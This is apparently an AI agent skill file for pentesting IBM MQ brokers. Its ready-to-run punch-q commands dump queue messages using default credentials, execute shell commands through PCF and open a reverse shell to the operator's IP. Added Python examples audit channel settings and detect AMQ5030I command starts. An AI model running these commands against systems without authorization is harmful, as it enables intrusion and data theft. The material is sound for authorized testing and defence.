Hacktricks-skills ibm-mq-pentesting

Pentest IBM MQ message brokers on port 1414. Use this skill whenever the user mentions IBM MQ, message queues, port 1414, punch-q, pymqi, or needs to enumerate/exploit IBM MQ instances. This skill covers enumeration of queue managers, channels, and queues, plus exploitation techniques including message dumping and remote code execution via PCF commands.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/1414-pentesting-ibmmq/SKILL.MD
source content

IBM MQ Pentesting

A skill for pentesting IBM MQ message brokers, which typically expose TCP port 1414. This skill helps you enumerate and exploit IBM MQ instances using tools like punch-q and pymqi.

When to use this skill

Use this skill when:

  • You discover port 1414 open on a target
  • You need to enumerate IBM MQ queue managers, channels, or queues
  • You want to dump messages from IBM MQ queues
  • You need to execute commands on an IBM MQ server via PCF
  • The user mentions IBM MQ, punch-q, pymqi, or message queue exploitation

Quick Start

1. Check if IBM MQ is accessible

# Test connectivity to port 1414
nc -zv <target> 1414

2. Discover Queue Manager name

# Using punch-q with Docker
sudo docker run --rm -ti leonjza/punch-q --host <target> --port 1414 discover name

# Output example:
# Queue Manager name: MYQUEUEMGR

3. Enumerate channels

# Try with credentials (some instances accept unauthenticated requests)
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  discover channels

# Once you have a channel, enumerate all channels
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  show channels -p '*'

4. Enumerate queues

sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  show queues -p '*'

5. Dump messages (non-destructive)

# Sniff messages
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  messages sniff

# Dump messages
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  messages dump

6. Remote code execution

# Execute a command
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  command execute --cmd "/bin/sh" --args "-c id"

# Reverse shell (punch-q's built-in `command reverse`)
sudo docker run --rm -ti leonjza/punch-q \
  --host <target> --port 1414 \
  --username admin --password passw0rd \
  --channel DEV.ADMIN.SVRCONN \
  command reverse -i <your-ip> -p 4444

Tools

punch-q (Recommended)

With Docker:

sudo docker run --rm -ti leonjza/punch-q

Without Docker:

git clone https://github.com/sensepost/punch-q
cd punch-q
pip install -r requirements.txt
python3 setup.py install

pymqi (Manual approach)

Install IBM MQ dependencies first, then:

pip install pymqi

See scripts/setup_pymqi.sh for installation instructions.

Common default credentials

  • Username: admin
  • Password: passw0rd

Some instances accept unauthenticated requests.
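On the defensive side, the condition that lets the default-credential and unauthenticated cases above succeed is usually visible in the SVRCONN channel definitions themselves. The following is an added example, not code from the HackTricks skill or from punch-q: it parses the output of an MQSC `DISPLAY CHANNEL(*) CHLTYPE(SVRCONN) MCAUSER SSLCIPH` command (the sample output below is constructed, with invented channel names and values) and flags channels whose MCAUSER is blank or `mqm`, or whose SSLCIPH is blank. It inspects channel attributes only; CHLAUTH rules and CONNAUTH settings at the queue manager level can still block or narrow what such a channel allows, so treat the findings as leads to verify rather than verdicts.

```python
import re
from typing import Dict, List

# Constructed sample in the style of `runmqsc` output for
# DISPLAY CHANNEL(*) CHLTYPE(SVRCONN) MCAUSER SSLCIPH.
# Invented for this example; not taken from any real queue manager.
SAMPLE_MQSC = """\
     1 : DISPLAY CHANNEL(*) CHLTYPE(SVRCONN) MCAUSER SSLCIPH
AMQ8414I: Display Channel details.
   CHANNEL(DEV.ADMIN.SVRCONN)              CHLTYPE(SVRCONN)
   MCAUSER( )                              SSLCIPH( )
AMQ8414I: Display Channel details.
   CHANNEL(DEV.APP.SVRCONN)                CHLTYPE(SVRCONN)
   MCAUSER(app)                            SSLCIPH(ANY_TLS12_OR_HIGHER)
AMQ8414I: Display Channel details.
   CHANNEL(OPS.SVRCONN)                    CHLTYPE(SVRCONN)
   MCAUSER(mqm)                            SSLCIPH( )
"""

# MQSC prints attributes as NAME(value); a blank value shows as "( )".
ATTR_RE = re.compile(r"([A-Z]+)\(([^)]*)\)")


def parse_channels(text: str) -> List[Dict[str, str]]:
    """Split runmqsc output into one attribute dict per AMQ8414I channel record."""
    channels: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    in_record = False
    for line in text.splitlines():
        if line.startswith("AMQ8414I"):
            current = {}
            channels.append(current)
            in_record = True
            continue
        if not in_record:
            continue  # skip the echoed command line before the first record
        for key, value in ATTR_RE.findall(line):
            current[key] = value.strip()
    return channels


def assess_channel(channel: Dict[str, str]) -> List[str]:
    """Channel-level findings for a SVRCONN definition (empty list means nothing flagged)."""
    findings: List[str] = []
    if channel.get("CHLTYPE") != "SVRCONN":
        return findings
    mcauser = channel.get("MCAUSER", "")
    if mcauser == "":
        findings.append("MCAUSER is blank: authorization uses the identity the client supplies, "
                        "so the channel itself caps nothing")
    elif mcauser.lower() == "mqm":
        findings.append("MCAUSER(mqm): every client on this channel acts with full "
                        "administrative authority")
    if channel.get("SSLCIPH", "") == "":
        findings.append("SSLCIPH is blank: no TLS, so credentials and messages cross the "
                        "network in clear")
    return findings


def assess(text: str) -> Dict[str, List[str]]:
    """Map each channel name to its findings."""
    return {ch["CHANNEL"]: assess_channel(ch) for ch in parse_channels(text)}


if __name__ == "__main__":
    for name, findings in assess(SAMPLE_MQSC).items():
        status = "OK" if not findings else "REVIEW"
        print(f"{status:6} {name}")
        for f in findings:
            print(f"       - {f}")
```

Feed it the saved output of `runmqsc` from a queue manager you administer; channels with no findings still deserve a look at the CHLAUTH and CONNAUTH configuration that the example does not parse.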

Important notes

  1. Asynchronous execution: Command execution is asynchronous. You need a second mechanism to leverage the exploit (reverse shell listener, file creation, data exfiltration).

  2. PCF commands: IBM MQ can be controlled via PCF (Programmable Command Formats). The MQCMD_CREATE_SERVICE command allows arbitrary command execution with mqm authority.

  3. Iterate on all queues: When dumping messages, try all identified queues as they may contain different data.

  4. Check logs: After command execution, check IBM MQ logs for confirmation:

    AMQ5030I: The Command '<command-id>' has started. ProcessId(<pid>).
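Notes 2 and 4 together give defenders a detection point: a service created through PCF and started shows up in the queue manager error log (AMQERR01.LOG under the queue manager's errors directory) as the AMQ5030I line quoted above. The following is an added example, not code from the HackTricks skill or from punch-q: it parses constructed log text in that layout, pairs each AMQ5030I record with the timestamp, user and queue manager from the header block that precedes it, and flags any command whose quoted name is not on an allowlist of services the operations team actually defined. The allowlist contents and the service names in the sample are assumptions for the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Set

# Constructed sample in the layout of an IBM MQ queue manager error log
# (AMQERR01.LOG). Every value here is invented for this example.
SAMPLE_LOG = """\
07/01/2024 10:15:32 - Process(4321.1) User(mqm) Program(amqzmgr0)
                      Host(mqhost) Installation(Installation1)
                      VRMF(9.3.0.0) QMgr(MYQUEUEMGR)

AMQ5030I: The Command 'NIGHTLY_BACKUP' has started. ProcessId(5001).

EXPLANATION:
The command has started.
ACTION:
None.
----- amqzmgr0.c : 1111 --------------------------------------------------------
07/01/2024 10:17:05 - Process(4321.1) User(mqm) Program(amqzmgr0)
                      Host(mqhost) Installation(Installation1)
                      VRMF(9.3.0.0) QMgr(MYQUEUEMGR)

AMQ5030I: The Command 'QCeLkZ' has started. ProcessId(5017).

EXPLANATION:
The command has started.
ACTION:
None.
----- amqzmgr0.c : 1111 --------------------------------------------------------
"""

# First line of every record: timestamp, process, user and program.
HEADER_RE = re.compile(
    r"^(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) - Process\(([^)]+)\) User\(([^)]+)\) Program\(([^)]+)\)"
)
# QMgr appears on a continuation line of the header block.
QMGR_RE = re.compile(r"QMgr\(([^)]+)\)")
# The message line this note says confirms execution.
AMQ5030_RE = re.compile(r"^AMQ5030I: The Command '([^']*)' has started\. ProcessId\((\d+)\)\.")


@dataclass
class CommandStart:
    timestamp: str
    qmgr: str
    user: str
    command: str  # the quoted value from the AMQ5030I line
    pid: int


def parse_command_starts(log_text: str) -> List[CommandStart]:
    """Collect every AMQ5030I record together with the header that precedes it."""
    starts: List[CommandStart] = []
    timestamp = user = qmgr = ""
    for line in log_text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            timestamp, user = header.group(1), header.group(3)
            qmgr = ""  # reset; the QMgr continuation line follows
            continue
        qm = QMGR_RE.search(line)
        if qm:
            qmgr = qm.group(1)
            continue
        hit = AMQ5030_RE.match(line)
        if hit:
            starts.append(CommandStart(timestamp, qmgr, user, hit.group(1), int(hit.group(2))))
    return starts


def unexpected_command_starts(starts: Iterable[CommandStart], allowlist: Set[str]) -> List[CommandStart]:
    """Return the AMQ5030I records whose command name is not a known, approved service."""
    return [s for s in starts if s.command not in allowlist]


if __name__ == "__main__":
    # Assumed allowlist: the services the operations team defined on purpose.
    records = parse_command_starts(SAMPLE_LOG)
    for r in unexpected_command_starts(records, {"NIGHTLY_BACKUP"}):
        print(f"{r.timestamp} {r.qmgr}: unexpected command '{r.command}' "
              f"started as pid {r.pid} (user {r.user})")
```

Run it against the real AMQERR0n.LOG files or ship the same regexes to the log pipeline; the ProcessId it extracts is the handle to pivot from the log to the process tree on the host when a hit needs investigating.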
    

Scripts

Use the bundled scripts for common tasks:

  • scripts/enumerate_ibmmq.py - Automated enumeration of queue managers, channels, and queues
  • scripts/exploit_ibmmq.py - Command execution and reverse shell payloads
  • scripts/setup_pymqi.sh - Install IBM MQ dependencies for pymqi
  • scripts/setup_test_env.sh - Set up a local IBM MQ test environment

References